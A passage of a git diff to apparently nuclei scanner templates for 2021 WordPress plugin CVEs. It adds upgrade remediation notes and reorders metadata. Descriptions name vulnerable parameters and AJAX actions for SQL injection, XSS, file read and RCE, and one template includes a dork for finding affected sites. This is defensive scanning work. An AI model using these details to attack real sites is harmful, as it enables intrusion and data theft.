max-request: 1 verified: "true" - framework: wordpress + max-request: 1 vendor: genetechsolutions product: pie_register + framework: wordpress tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth http: diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 124d030b55..b38d486877 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -5,6 +5,8 @@ info: author: Supras severity: medium description: WordPress plugin Sassy Social Share < 3.3.40 contains a reflected cross-site scripting vulnerability. + remediation: | + Update the WordPress Sassy Social Share Plugin to version 3.3.40 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa - https://nvd.nist.gov/vuln/detail/CVE-2021-24746 @@ -14,14 +16,14 @@ info: cve-id: CVE-2021-24746 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - google-query: inurl:"/wp-content/plugins/sassy-social-share" - framework: wordpress vendor: heateor product: sassy_social_share + framework: wordpress + google-query: inurl:"/wp-content/plugins/sassy-social-share" tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan http: diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 6b03e8d439..f4f4af92d8 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -5,6 +5,8 @@ info: author: cckuakilong severity: high description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks. + remediation: | + Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability. reference: - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24750 cwe-id: CWE-89 epss-score: 0.00791 - cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* epss-percentile: 0.79355 + cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: wp_visitor_statistics_\(real_time_traffic\)_project product: wp_visitor_statistics_\(real_time_traffic\) + framework: wordpress tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index d7d14c2f64..f86205bb4b 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. + remediation: | + Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability. reference: - https://www.exploit-db.com/exploits/50766 - https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-24762 cwe-id: CWE-89 epss-score: 0.00848 - cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:* epss-percentile: 0.80045 + cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: getperfectsurvey product: perfect_survey + framework: wordpress tags: cve,wpscan,cve2021,sqli,wp,wordpress,wp-plugin,unauth,edb http: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 823cbecb60..9562750625 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 - https://wordpress.org/plugins/asgaros-forum/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-24827 cwe-id: CWE-89 epss-score: 0.17594 - cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95442 + cpe: cpe:2.3:a:asgaros:asgaros_forum:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: asgaros product: asgaros_forum + framework: wordpress tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli http: diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 8c81550e41..0101da3f88 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Update to the latest version of WordPress AnyComment plugin (0.3.5 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82 - https://nvd.nist.gov/vuln/detail/CVE-2021-24838 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-24838 cwe-id: CWE-601 epss-score: 0.00106 - cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* epss-percentile: 0.42451 + cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: bologer product: anycomment + framework: wordpress tags: redirect,anycomment,wpscan,cve,cve2021,wordpress,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 6a3f5054ba..0526fe9643 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -6,26 +6,26 @@ info: severity: high description: | WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator. + remediation: Fixed in version 5.0.1.6. reference: - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615 - https://wordpress.org/plugins/custom-registration-form-builder-with-submission-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24862 - http://packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html - remediation: Fixed in version 5.0.1.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24862 cwe-id: CWE-89 epss-score: 0.61777 - cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97374 + cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: metagauss product: registrationmagic + framework: wordpress tags: wpscan,cve,wp-plugin,cve2021,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm http: diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index 45d241e6e2..f53d6b8b22 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.0.39. reference: - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715 - https://nvd.nist.gov/vuln/detail/CVE-2021-24875 - remediation: Fixed in version 3.0.39. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49453 + cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: implecode product: ecommerce_product_catalog + framework: wordpress tags: wp,authenticated,wpscan,ecommerce-product-catalog,cve,cve2022,xss,wordpress,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index 54c95a8e1d..c51d552657 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash. + remediation: | + Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability. reference: - https://www.jbelamor.com/xss-elementor-lightox.html - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44609 + cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: elementor product: website_builder + framework: wordpress tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss http: diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml index 5e68dfe34d..fbe7dc897c 100644 --- a/http/cves/2021/CVE-2021-24910.yaml +++ b/http/cves/2021/CVE-2021-24910.yaml @@ -5,6 +5,8 @@ info: author: Screamy severity: medium description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response. + remediation: | + Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability. reference: - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-24910 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: transposh product: transposh_wordpress_translation + framework: wordpress tags: cve2021,wordpress,wp-plugin,xss,wp,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 2b206d81ce..24f1c78e7b 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -5,25 +5,25 @@ info: author: akincibor severity: high description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location. + remediation: Fixed in version 1.9.1. reference: - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 - https://nvd.nist.gov/vuln/detail/CVE-2021-24917 - https://wordpress.org/support/topic/bypass-security-issue/ - remediation: Fixed in version 1.9.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24917 cwe-id: CWE-863 epss-score: 0.04226 - cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* epss-percentile: 0.91138 + cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: wpserveur product: wps_hide_login + framework: wordpress tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve http: diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index 6cb926644e..d489511a16 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page. + remediation: | + Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.00171 - cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* epss-percentile: 0.53541 + cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: domaincheckplugin product: domain_check + framework: wordpress tags: wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated http: diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index c37df90d70..95ad909099 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Fixed in version 2.8.2. reference: - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 - https://wordpress.org/plugins/secure-copy-content-protection/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24931 - http://packetstormsecurity.com/files/165946/WordPress-Secure-Copy-Content-Protection-And-Content-Locking-2.8.1-SQL-Injection.html - remediation: Fixed in version 2.8.2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24931 cwe-id: CWE-89 epss-score: 0.12212 - cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* epss-percentile: 0.94654 + cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: ays-pro product: secure_copy_content_protection_and_content_locking + framework: wordpress tags: wp-plugin,cve,wp,packetstorm,unauth,wpscan,cve2021,sqli,wordpress,secure-copy-content-protection http: diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 3f0e5dd14b..79473b6045 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in 5.9.8. reference: - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f - https://nvd.nist.gov/vuln/detail/CVE-2021-24940 - remediation: Fixed in 5.9.8. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24940 cwe-id: CWE-79 epss-score: 0.00141 - cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49173 + cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: woocommerce product: persian-woocommerce + framework: wordpress tags: wp,xss,authenticated,wpscan,cve,cve2021,wordpress,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 9665593dc4..2c1b45b0b4 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445 - https://wordpress.org/plugins/modern-events-calendar-lite/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-24946 cwe-id: CWE-89 epss-score: 0.05911 - cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* epss-percentile: 0.92472 + cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: webnus product: modern_events_calendar_lite + framework: wordpress tags: cve2021,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,cve,modern-events-calendar-lite,wordpress http: diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index 67f6133cb7..caa7b393e6 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server. + remediation: | + Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24947 cwe-id: CWE-352,CWE-863 epss-score: 0.00444 - cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* epss-percentile: 0.71723 + cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: thinkupthemes product: responsive_vector_maps + framework: wordpress tags: cve,authenticated,wpscan,cve2021,lfi,wp,wordpress,wp-plugin,lfr http: diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index 57e1831c7b..7f2280bad2 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue. + remediation: Fixed in version 6.8.7 reference: - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2 - https://nvd.nist.gov/vuln/detail/CVE-2021-24956 - remediation: Fixed in version 6.8.7 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24956 cwe-id: CWE-79 epss-score: 0.00106 - cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* epss-percentile: 0.42451 + cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: adenion product: blog2social + framework: wordpress tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 94097db836..5fa6ee4e85 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -6,25 +6,25 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Fixed in version 2.5.4. reference: - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10 - https://wordpress.org/plugins/all-in-one-video-gallery - https://nvd.nist.gov/vuln/detail/CVE-2021-24970 - remediation: Fixed in version 2.5.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24970 cwe-id: CWE-22 epss-score: 0.02825 - cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.89345 + cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: plugins360 product: all-in-one_video_gallery + framework: wordpress tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,lfi,authenticated http: diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index 9daeddac3f..8a9bc56191 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -5,6 +5,8 @@ info: author: Akincibor severity: medium description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response. + remediation: | + Update to the latest version of the WordPress Super Socializer plugin (7.13.30 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/a14b668f-812f-46ee-827e-0996b378f7f0 - https://nvd.nist.gov/vuln/detail/CVE-2021-24987 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24987 cwe-id: CWE-79 epss-score: 0.00097 - cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.39802 + cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: heateor product: super_socializer + framework: wordpress tags: cve,cve2021,wpscan,xss,wp,wp-plugin,wordpress http: diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml index 468204ccc7..031bf5fbdc 100644 --- a/http/cves/2021/CVE-2021-24991.yaml +++ b/http/cves/2021/CVE-2021-24991.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard. + remediation: | + Update to the latest version of the WooCommerce PDF Invoices & Packing Slips WordPress Plugin (2.10.5 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-24991 cwe-id: CWE-79 epss-score: 0.00069 - cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:* epss-percentile: 0.28575 + cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\&_packing_slips:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: wpovernight product: woocommerce_pdf_invoices\&_packing_slips + framework: wordpress tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 1765441b2c..edea93be49 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -5,6 +5,8 @@ info: author: Evan Rubinstein severity: medium description: WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another. + remediation: | + Update to the latest version of the WordPress Guppy plugin (version >1.1) to mitigate the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/50540 - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24997 cwe-id: CWE-862 epss-score: 0.00213 - cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* epss-percentile: 0.5851 + cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wp-guppy product: wp_guppy + framework: wordpress tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan http: diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index e2a2c8dc98..3f9619324c 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a - https://wordpress.org/plugins/wpcargo/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-25003 cwe-id: CWE-434,CWE-94 epss-score: 0.5944 - cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97311 + cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: wptaskforce product: wpcargo_track_\&_trace + framework: wordpress tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan,intrusive variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index d61ed36b6b..f2a0e226e6 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue. + remediation: | + Update the Code Snippets WordPress Plugin to version 2.14.3 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a - https://nvd.nist.gov/vuln/detail/CVE-2021-25008 @@ -14,13 +16,13 @@ info: cve-id: CVE-2021-25008 cwe-id: CWE-79 epss-score: 0.00106 - cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* epss-percentile: 0.42451 + cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: codesnippets product: code_snippets + framework: wordpress tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index 8faeb91217..f9fc0718ea 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress Event Tickets < 5.2.2 is susceptible to an open redirect vulnerability. The plugin does not validate the 